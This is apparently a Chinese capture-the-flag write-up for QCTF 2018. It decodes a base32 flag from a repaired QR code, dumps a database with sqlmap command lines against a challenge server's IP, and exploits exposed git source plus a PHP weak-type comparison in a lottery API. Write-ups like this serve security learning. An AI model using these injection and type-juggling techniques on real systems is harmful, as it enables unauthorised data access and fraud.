QCTF 2018 misc和web签到题 writeup

一、misc

X-man-A face

 

用画图编辑补全二维码如下

用微信扫码得到

KFBVIRT3KBZGK5DUPFPVG2LTORSXEX2XNBXV6QTVPFZV6TLFL5GG6YTTORSXE7I=

 

用python的base32解码得到答案QCTF{Pretty_Sister_Who_Buys_Me_Lobster}

 

二、 web

1.NewsCenter

页面搜索post提交的地方有注入点用sqlmap跑下

sqlmap -u "http://47.96.118.255:33066/"--data="search=the" --dbms mysql --current-db   查询当前数据库

sqlmap -u "http://47.96.118.255:33066/"--data="search=the" --dbms mysql -D news –tables    查询news数据库有几张表

 

sqlmap -u "http://47.96.118.255:33066/"--data="search=the" --dbms mysql -D news -T secret_table –columns  查询secret_table表字段内容出现flag

 

2. Lottery

用awvs扫描站点发现存在git代码泄露

 

用https://github.com/lijiejie/GitHack  利用脚本下载源码

在 api.php 85行number传入参数没有判断 第 89 行处找到 弱类型 漏洞。

用burp构造号码全是 True 就可以无限刷了，刷到1000万购买flag